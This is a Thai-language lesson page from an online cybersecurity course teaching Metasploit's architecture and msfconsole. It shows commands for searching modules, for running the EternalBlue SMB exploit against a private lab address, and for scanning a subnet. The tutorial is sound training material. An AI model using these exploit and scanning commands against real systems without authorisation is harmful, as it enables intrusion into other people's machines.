0Pricing
Cyber Security Academy · บทเรียน

สถาปัตยกรรม Metasploit และ msfconsole

เรียนรู้การใช้งาน msfconsole ทำความเข้าใจโครงสร้างของช่องโหว่ เพย์โหลด และโมดูล พร้อมกำหนดค่าตัวเลือก

สถาปัตยกรรม Metasploit และ msfconsole เป็นบทเรียน Cyber Security Academy ฟรีบน CoddyKit นี่คือบทเรียนที่ 1 จากทั้งหมด 4 บทเรียน คุณสามารถอ่านบทเรียนทั้งหมดด้านล่างฟรี — จากนั้นลองปฏิบัติด้วยตัวคุณเองในเบราว์เซอร์พร้อมตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7 บทเรียนนี้เป็นส่วนหนึ่งของเส้นทางการเรียน Cyber Security Academy และความก้าวหน้าของคุณจะซิงค์ข้ามเว็บและแอป CoddyKit คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน

Metasploit คืออะไร

Metasploit Framework เป็นแพลตฟอร์มทดสอบการเจาะระบบแบบโอเพนซอร์ส ซึ่งมีอินเทอร์เฟซแบบรวมสำหรับการพัฒนา การทดสอบ และการเรียกใช้โค้ดโจมตีช่องโหว่ แพลตฟอร์มนี้เป็นเครื่องมือมาตรฐานของอุตสาหกรรมสำหรับการใช้ประโยชน์จากช่องโหว่ที่ได้รับอนุญาตในสภาพแวดล้อมห้องปฏิบัติการ

คอมโพเนนต์ของ Metasploit

คอมโพเนนต์สำคัญ ได้แก่ msfconsole (CLI แบบโต้ตอบ), msfvenom (เครื่องมือสร้างเพย์โหลด), Metasploit DB (PostgreSQL สำหรับจัดเก็บโฮสต์/เซสชัน) และ Armitage (ส่วนหน้า GUI)

การเริ่มต้น msfconsole

เปิดใช้ msfconsole และเริ่มต้นฐานข้อมูล พรอมต์จะเปลี่ยนเป็น msf6 > การเติมคำอัตโนมัติด้วยแป้นแท็บใช้ได้กับคำสั่งทั้งหมด ชื่อโมดูล และตัวเลือก

# Start msfconsole
msfconsole

# Initialize database (if needed)
msfdb init
msfdb start

# Check DB connection
msf6 > db_status
# [*] Connected to msf. Connection type: postgresql.

ประเภทของโมดูล

Metasploit จัดความสามารถต่าง ๆ เป็นประเภทโมดูล ได้แก่ exploit (โค้ดโจมตีเฉพาะช่องโหว่), payload (โค้ดที่ทำงานหลังใช้ประโยชน์จากช่องโหว่), auxiliary (เครื่องมือสแกน/ฟัซเซอร์), post (การทำงานหลังการใช้ประโยชน์จากช่องโหว่), encoder และ nop

msf6 > show exploits       # list exploit modules
msf6 > show auxiliary      # list auxiliary modules
msf6 > show payloads       # list payloads
msf6 > show post           # post-exploitation modules

การค้นหาโมดูล

คำสั่ง search จะกรองโมดูลตามชื่อ CVE แพลตฟอร์ม หรือระดับความน่าเชื่อถือ ระดับของโมดูลบ่งบอกความน่าเชื่อถือ: Excellent > Great > Good > Normal > Average > Low

msf6 > search type:exploit name:eternalblue
msf6 > search cve:2021-44228
msf6 > search platform:windows smb
msf6 > search rank:excellent ms17

การใช้โมดูลโจมตีช่องโหว่

เลือกโมดูลด้วย use ดูตัวเลือกที่จำเป็นด้วย show options กำหนดค่าด้วย set และเรียกใช้ด้วย run หรือ exploit

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > show options
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.10
msf6 exploit(ms17_010_eternalblue) > run

การกำหนดตัวเลือกส่วนกลาง

setg จะกำหนดตัวเลือกให้ใช้ทั่วโลกกับโมดูลถัดไปทั้งหมด ซึ่งมีประโยชน์สำหรับ LHOST, LPORT และ RHOSTS ที่ยังคงเดิมตลอดการประเมิน

msf6 > setg LHOST 192.168.1.10
msf6 > setg LPORT 4444

# Unset global
msf6 > unsetg LHOST

โมดูลเสริม

โมดูลเสริมใช้สำหรับการสแกน การแจกแจงข้อมูล และการฟัซซิง โดยไม่ส่งเพย์โหลด ตัวอย่างเช่น เครื่องมือสแกนรุ่นของ SMB การเดารหัสผ่านเพื่อเข้าสู่ระบบ SSH แบบลองทุกความเป็นไปได้ และเครื่องมือสแกนไดเรกทอรี HTTP

msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(smb_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(smb_version) > set THREADS 10
msf6 auxiliary(smb_version) > run

การจัดการพื้นที่ทำงาน

พื้นที่ทำงานใช้จัดระเบียบข้อมูลการสแกนและเซสชันแยกตามการประเมินแต่ละครั้ง สร้างพื้นที่ทำงานใหม่เมื่อเริ่มการประเมินแต่ละครั้งเพื่อแยกข้อมูลออกจากกัน

msf6 > workspace                 # list workspaces
msf6 > workspace -a lab_test     # create
msf6 > workspace lab_test        # switch
msf6 > hosts                     # show discovered hosts
msf6 > services                  # show discovered services

การผสานรวม Nmap

นำเข้าผลการสแกน XML ของ Nmap ไปยังฐานข้อมูลของ Metasploit ได้โดยตรง เพื่อเติมข้อมูลลงในตารางโฮสต์และบริการ ทำให้เลือกโมดูลได้อย่างตรงเป้าหมาย

msf6 > db_nmap -sV 192.168.1.0/24
# Or import existing XML:
msf6 > db_import /path/to/scan.xml
msf6 > hosts
msf6 > services -p 445

ความช่วยเหลือและเอกสารประกอบ

ทุกโมดูลมีเอกสารประกอบในตัว ใช้ info เพื่ออ่านคำอธิบายโมดูล ระดับความน่าเชื่อถือ แหล่งอ้างอิง (CVE, คำแนะนำด้านความปลอดภัย) และตัวเลือกที่จำเป็น

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > info

# Shows: description, CVE references,
# platform, architecture, reliability rank

ตรวจสอบอย่างรวดเร็ว

คำสั่งใดใช้เลือกโมดูลใน msfconsole

สรุป: สถาปัตยกรรมของ Metasploit

msfconsole เป็นศูนย์กลางสำหรับค้นหาโมดูล กำหนดตัวเลือก เรียกใช้โค้ดโจมตีช่องโหว่ และจัดการเซสชัน ทำงานภายในพื้นที่ทำงานที่ตั้งชื่อไว้เสมอ นำเข้าผลลัพธ์จาก Nmap เพื่อเติมข้อมูลในฐานข้อมูล และอ่านข้อมูลโมดูลก่อนเรียกใช้สิ่งใด ๆ — ทำความเข้าใจว่าคุณกำลังเรียกใช้อะไรและเพราะเหตุใด

คำถามที่พบบ่อย

บทเรียน “สถาปัตยกรรม Metasploit และ msfconsole” ฟรีหรือไม่

ใช่ — ข้อความเต็มของ “สถาปัตยกรรม Metasploit และ msfconsole” ฟรีให้อ่านที่นี่บนเว็บ เพื่อปฏิบัติแบบโต้ตอบ (ตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7) และปลดล็อคส่วนที่เหลือของคอร์ส Cyber Security Academy ให้อัปเกรดเป็น CoddyKit PRO คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน

คุณจะเรียนรู้อะไรในบทเรียน “สถาปัตยกรรม Metasploit และ msfconsole”

เรียนรู้การใช้งาน msfconsole ทำความเข้าใจโครงสร้างของช่องโหว่ เพย์โหลด และโมดูล พร้อมกำหนดค่าตัวเลือก คุณปฏิบัติ Cyber Security Academy ด้วยโค้ดที่ใช้งานได้จริงที่คุณเรียกใช้โดยตรงในเบราว์เซอร์ และติวเตอร์ AI ตลอด 24/7 ตอบคำถามของคุณขณะที่คุณไปผ่านบทเรียน

คุณต้องมีประสบการณ์ก่อนที่จะเริ่มเรียน Cyber Security Academy หรือไม่

ไม่จำเป็นต้องมีประสบการณ์มาก่อน Cyber Security Academy บน CoddyKit ออกแบบมาสำหรับผู้เริ่มต้นไปจนถึงผู้เรียนขั้นสูง คุณสามารถเริ่มต้นที่นี่หรือเริ่มจากตัวแรกและเรียนด้วยความเร็วของคุณเอง นี่คือบทเรียนที่ 1 จากทั้งหมด 4 บทเรียน

บทเรียน “สถาปัตยกรรม Metasploit และ msfconsole” ใช้เวลานานแค่ไหน

บทเรียน CoddyKit ส่วนใหญ่ใช้เวลาประมาณ 5–10 นาที แต่ละบทเรียนจึงสั้นและเป็นแบบโต้ตอบ คุณสามารถก้าวหน้าอย่างต่อเนื่องและกลับมาเรียนต่อจากตรงที่เพิ่งหยุดบนเว็บและแอปได้เลย

ฉันเขียนและรันโค้ดในบทเรียน Cyber Security Academy นี้ได้ไหม

ได้ บทเรียน Cyber Security Academy ทุกบทมีตัวแก้ไขโค้ดในตัว คุณจึงเขียนและรันโค้ดจริงได้เลยในเบราว์เซอร์ และได้รับข้อเสนอแนะจาก AI ในทันที — ไม่ต้องติดตั้งในเครื่องของคุณ

บทเรียนทั้งหมดในหลักสูตรนี้

  1. สถาปัตยกรรม Metasploit และ msfconsole
  2. การใช้ประโยชน์จากช่องโหว่ที่ทราบแล้ว
  3. เพย์โหลด: แบบแบ่งขั้นกับแบบไม่แบ่งขั้น และ Meterpreter
  4. หลังการเจาะระบบ: เปลี่ยนเส้นทางและคงอยู่
← กลับไปที่ Cyber Security Academy